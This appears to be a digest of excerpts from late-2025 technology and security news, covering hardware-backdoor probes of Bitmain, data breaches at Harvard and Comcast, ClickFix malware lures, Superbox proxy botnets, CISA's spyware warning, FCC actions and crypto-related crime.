Source: Gizmodo
https://gizmodo.com/homeland-security-is-reportedly-probing-bitcoin-mining-giant-bitmain-for-national-security-reasons-2000689746
According to a new report from Bloomberg, federal authorities have quietly been digging into Bitmain, the Beijing-based bitcoin mining hardware manufacturing giant, over fears that its devices could serve as a backdoor for Chinese espionage or even deliberate blackouts on the U.S. electrical grid. The Department of Homeland Security is said to have been running a secretive probe dubbed “Operation Red Sunset” for months, with agents tearing apart imported machines at ports in search of hidden kill switches or remote-access tricks.
Of course, fears of Beijing slipping backdoors into hardware have been prevalent for over a decade, with claims ranging from People’s Liberation Army operatives forcing subcontractors to solder rice-grain-sized spy chips onto Supermicro server motherboards to Vodafone admitting it found hidden backdoors in Huawei telecom gear deployed across Italy. Just this year, reports surfaced of undocumented cellular modems lurking inside Chinese solar inverters sold across Europe and the U.S., quietly pinging home even when powered off, prompting frantic teardowns and emergency firmware nukes.
That said, hard proof of intentional state-level sabotage oftentimes remains murky (or potentially classified).
[…]
Subject: How to Scan, Sign, and Send a Contract From Your Android Device in 2025
Source: Android Headlines
https://www.androidheadlines.com/2025/11/how-to-scan-sign-and-send-a-contract-from-your-android-device-in-2025.html
A crucial contract lands in your inbox, but you’re away from your desk. The deadline is tight. This isn’t a problem—it’s an opportunity to leverage the powerful device in your pocket. In today’s fast-paced professional world, waiting for access to a desktop and scanner is a luxury few can afford. The modern smartphone is no longer just a communication tool; it has become a complete mobile office capable of handling sensitive paperwork with the same efficiency and professionalism as a traditional setup. This shift is supported by the rapid adoption of mobile-first document solutions, a trend reflected in the continued growth of the online fax market, proving that professionals are increasingly relying on their phones to get work done from anywhere. This guide will walk you through a simple, three-step workflow to scan, sign, and securely send any document using only your Android device.[…]
Filed: https://www.androidheadlines.com/category/apps
Source: bleepingcomputer
https://www.bleepingcomputer.com/news/security/harvard-university-discloses-data-breach-affecting-alumni-donors/
Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.
The exposed data includes email addresses, telephone numbers, home and business addresses, event attendance records, donation details, and “biographical information pertaining to University fundraising and alumni engagement activities.”
However, according to Klara Jelinkova, Harvard’s Vice President and University Chief Information Officer, and Jim Husson, the university’s Vice President for Alumni Affairs and Development, the compromised IT systems didn’t contain Social Security numbers, passwords, payment card information, or financial info.
Source: Help Net Security
https://www.helpnetsecurity.com/2025/11/24/hornetsecurity-email-attack-tactics-report/
The threat landscape is forcing CISOs to rethink what they consider normal. The latest Cybersecurity Report 2026 by Hornetsecurity, based on analysis of more than 70 billion emails and broad threat telemetry, shows attackers adopting automation, AI driven social engineering, and new evasion techniques at scale.
Email becomes a more dangerous channel – Email remains the primary entry point for compromise. Malware in email increased by more than 130% year over year. Scams rose by more than 30% and phishing increased by more than 20%. These categories continue to drive most of the operational impact that organizations experience, including account compromise and business disruption.
TXT files grew more than 180% as a malicious carrier, and legacy DOC files grew more than 118%. These are file types that many security teams no longer view as high risk. Their resurgence reflects an attacker strategy to exploit blind spots in filtering and inspection. ZIP archives remain common, while formats like HTML and RAR declined.
[…]
Attackers increasingly use forged headers, obscure top level domains, URL shortening, and HTML techniques that confuse filters rather than readers. The goal is to slip past controls, avoid early detection, and begin multi step intrusion chains.
…
Source: Krebs on Security
https://krebsonsecurity.com/2025/11/is-your-android-tv-streaming-box-part-of-a-botnet/
On the surface, the Superbox media streaming devices for sale at retailers like BestBuy and Walmart may seem like a steal: They offer unlimited access to more than 2,200 pay-per-view and streaming services like Netflix, ESPN and Hulu, all for a one-time fee of around $400. But security experts warn these TV boxes require intrusive software that forces the user’s network to relay Internet traffic for others, traffic that is often tied to cybercrime activity such as advertising fraud and account takeovers.
Superbox bills itself as an affordable way for households to stream all of the television and movie content they could possibly want, without the hassle of monthly subscription fees — for a one-time payment of nearly $400.
“Tired of confusing cable bills and hidden fees?,” Superbox’s website asks in a recent blog post titled, “Cheap Cable TV for Low Income: Watch TV, No Monthly Bills.”
“Real cheap cable TV for low income solutions does exist,” the blog continues. “This guide breaks down the best alternatives to stop overpaying, from free over-the-air options to one-time purchase devices that eliminate monthly bills.”
Superbox claims that watching a stream of movies, TV shows, and sporting events won’t violate U.S. copyright law.
Superbox’s homepage includes a prominent message stating the company does “not sell access to or preinstall any apps that bypass paywalls or provide access to unauthorized content.” The company explains that they merely provide the hardware, while customers choose which apps to install.
“We only sell the hardware device,” the notice states. “Customers must use official apps and licensed services; unauthorized use may violate copyright law.”
Experts say while these Android streaming boxes generally do what they advertise — enabling buyers to stream video content that would normally require a paid subscription — the apps that enable the streaming also ensnare the user’s Internet connection in a distributed residential proxy network that uses the devices to relay traffic from others.
Superbox doesn’t advertise its products in the conventional sense. Rather, it seems to rely on lesser-known influencers on places like Youtube and TikTok to promote the devices. Meanwhile, Ashley said, Superbox pays those influencers 50 percent of the value of each device they sell.
These streaming devices from no-name technology vendors are another example of the maxim, “If something is free, you are the product,” meaning the company is making money by selling access to and/or information about its users and their data.
This explainer from the Electronic Frontier Foundation delves a bit deeper into each of the potential symptoms listed above.
Source: BleepingComputer.com
https://www.bleepingcomputer.com/news/security/clickfix-attack-uses-fake-windows-update-screen-to-push-malware/
ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.
ClickFix is a social-engineering attack where users are convinced to paste and execute in Windows Command Prompt code or commands that lead to running malware on the system.
The attack has been widely adopted by cybercriminals across all tiers due to its high effectiveness and has continually evolved, with increasingly advanced and deceptive lures.
Fullscreen browser page – Since October 1st, researchers have observed ClickFix attacks where the pretense for executing dangerous commands was completing the installation of a critical Windows security update and the more common “human verification” lure [1, 2].
The fake update page instructs victims to press specific keys in a certain sequence, which pastes and executes commands from the attacker that were automatically copied to the clipboard via JavaScript running on the site.
Source: FCC
https://www.fcc.gov/document/fcc-corrects-course-outlines-improved-cybersecurity-measures
Agency Revokes Unlawful Decision and Repositions Agency for Effective and Agile Cybersecurity ResponsivenessWASHINGTON, November 20, 2025—The Federal Communications Commission today took action to correct course and rescind an unlawful and ineffective prior Declaratory Ruling misconstruing the Communications Assistance for Law Enforcement Act (CALEA). The Order also withdraws an NPRM that accompanied that Declaratory Ruling, which was based in part on the Declaratory Ruling’s flawed legal analysis and proposed ineffective cybersecurity requirements. Today’s action follows months-long engagement with communications service providers where they have demonstrated a strengthened cybersecurity posture following Salt Typhoon.Foreign adversaries and other bad actors have repeatedly launched cyberattacks targeting American communications networks.
Over the past several months, the agency has engaged with providers that have agreed to take “extensive, urgent, and coordinated efforts to mitigate operational risks, protect consumers, and preserve national security interests” against the range of cyberattacks that target their networks. Today’s action reinforces this commitment going forward.Since January, the Commission has taken a series of actions to harden communications networks and improve their security posture to enhance the agency’s investigative process into communications networks outages that result from cyber incidents. The Commission established a Council on National Security to facilitate the Commission’s engagement with national security partners and mitigate America’s vulnerabilities to cyberattacks, espionage, and surveillance by foreign adversaries. It has also adopted targeted rules to address the greatest cybersecurity risks to critical communications infrastructure without imposing inflexible and ambiguous requirements, for example requiring submarine cable licensees to create and implement cybersecurity risk management plans. The FCC has also adopted rules to ban “bad labs” in the FCC’s equipment authorization program to ensure no such entities are subject to untrustworthy actors that pose a risk to national security.Action by the Commission November 20, 2025 by Order on Reconsideration (FCC 25-81). Chairman Carr and Commissioner Trusty approving. Commissioner Gomez dissenting. Chairman Carr, Commissioners Gomez and Trusty issuing separate statements.PS Docket No. 22-329
###
Related Document(s):
Source: Newser
https://www.newser.com/story/379277/fake-courier-robs-sf-resident-of-11m-in-cryptocurrency.html
Police say the suspect pulled a gun, tied up the victim with duct tape, and fled with the victim’s phone, laptop, and the contents of his crypto wallet. Authorities have not released further details on how the cryptocurrency was accessed. The victim, described by Tan as a friend, suffered injuries that were not life-threatening. No arrests have been made.
Source: Newser
https://www.newser.com/story/379346/families-of-oct-7-victims-sue-binance.html
Binance, the world’s largest cryptocurrency exchange, is facing a lawsuit from the families of 300 American citizens who were injured or killed in the Oct. 7, 2023 attack on Israel. The families allege that Binance helped Hamas and other terrorist organizations move over $1 billion through its platform, effectively aiding terrorism, the New York Times reports.
The suit, filed in federal court in North Dakota, claims Binance ignored warnings about suspicious activity and failed to enforce basic security checks, allowing money to flow to groups like Hamas, Hezbollah, and Iran’s Islamic Revolutionary Guard Corps. The plaintiffs argue that Binance’s actions went beyond accidental lapses and were part of a deliberate strategy to attract high-risk clients and evade oversight. “This was not a compliance lapse; it was a business model,” said Jonathan Missner, a lawyer representing the families.
…
- The plaintiffs include Yechiel Leiter, the current Israeli ambassador to the US, Bloomberg reports. His son, an Israeli soldier, was killed by Hamas.
Source: Woodbury, MN
https://www.woodburymn.gov/225/CodeRED-Emergency-Notification-System
CodeRED Emergency Notification System
Source: The Register
https://www.theregister.com/2025/11/25/cisa_spyware_gangs/
Attackers sidestep encryption with spoofed apps and zero-click exploits to compromise ‘high-value’ mobile users – CISA has warned that state-backed snoops and cyber-mercenaries are actively abusing commercial spyware to break into Signal and WhatsApp accounts, hijack devices, and quietly rummage through the phones of what the agency calls “high-value” users.
In an alert published Monday, the US government’s cyber agency said it’s tracking multiple miscreants that are using a mix of phishing, bogus QR codes, malicious app impersonation, and, in some cases, full-blown zero-click exploits to compromise messaging apps which most people assume are safe.
The agency says the activity it’s seeing suggests an increasing focus on “high-value” individuals – everyone from current and former senior government, military, and political officials to civil society groups across the US, the Middle East, and Europe. In many of the campaigns, attackers delivered spyware first and asked questions later, using the foothold to deploy more payloads and deepen their access.
For example, Google’s Threat Intelligence Group in February detailed how multiple Russia-aligned crews, including Sandworm and Turla, attempted to snoop on Signal users by abusing the app’s “linked devices” feature. By coaxing victims into scanning a tampered QR code, the operators could quietly add a second, attacker-controlled device to the account. Once paired, new messages flowed to both ends in real time, letting Moscow’s finest eavesdrop.
…
Source: FedScoop
https://fedscoop.com/customs-border-protection-technology-detail-drivers/
Markey raised additional concerns about the implications of bulk collection of sensitive data, such as the potential for the government to track women traveling across state lines to seek abortion care. The idea of law enforcement stopping Americans and detaining them “based solely on an algorithmic determination about their driving behavior is deeply chilling,” he wrote, adding that the entire enterprise sparks “serious constitutional concerns” regarding unreasonable searches and seizures.
…
Filed: Emerging Tech
Source: BleepingComputer
https://www.bleepingcomputer.com/news/security/comcast-to-pay-15-million-fine-after-a-vendor-data-breach-affecting-270-000-customers/
Comcast will pay a $1.5 million fine to settle a Federal Communications Commission investigation into a February 2024 vendor data breach that exposed the personal information of nearly 275,000 customers.
The breach occurred in February 2024, when attackers hacked into the systems of Financial Business and Consumer Solutions (FBCS), a debt collector Comcast had stopped using two years earlier.
The FCBS data breach was initially believed to have affected 1.9 million people in total, but the tally was raised to 3.2 million in June and, finally, to 4.2 million in July.
Under the consent decree announced by the FCC on Monday, Comcast has also agreed to implement a compliance plan that includes enhanced vendor oversight to protect data and ensure customer privacy, ensuring its vendors properly dispose of customer information they no longer need for business purposes, as required by the Cable Communications Policy Act of 1984.
The telecommunications giant must also appoint a compliance officer, conduct risk assessments of vendors handling customer data every two years, file compliance reports with the FCC every six months over the next three years, and report any material violations within 30 days of discovery.
Source: The Hill
https://thehill.com/regulation/court-battles/5624570-biden-ai-robocall-lawsuit/
The Federal Communications Commission (FCC) also fined Kramer $6 million, which he has also not paid, the AP reported. After the robocall scandal erupted, the FCC banned the use of AI robocalls.
The robocall, using Biden’s voice, urged voters to hold off on voting in the New Hampshire primary and instead vote in November.
The call was the first known use of deepfake technology in U.S. politics, sparking a tidal wave of calls to regulate the use of AI in elections.
The fake Biden voice in the call encouraged thousands of New Hampshire primary voters to stay home and “save” their votes.
Source: Help Net Security
https://www.helpnetsecurity.com/2025/11/28/research-social-media-password-risk/
Many CISOs already assume that social media creates new openings for password guessing, but new research helps show what that risk looks like in practice. The findings reveal how much information can be reconstructed from public profiles and how that data influences the strength of user passwords. The study also examines how LLMs behave when asked to generate or evaluate passwords based on that same personal information.
The research team from the University of Cagliari and the University of Salerno created a tool called SODA ADVANCE to study these effects. The tool rebuilds user profiles using public data and evaluates password strength with a combined set of metrics.
…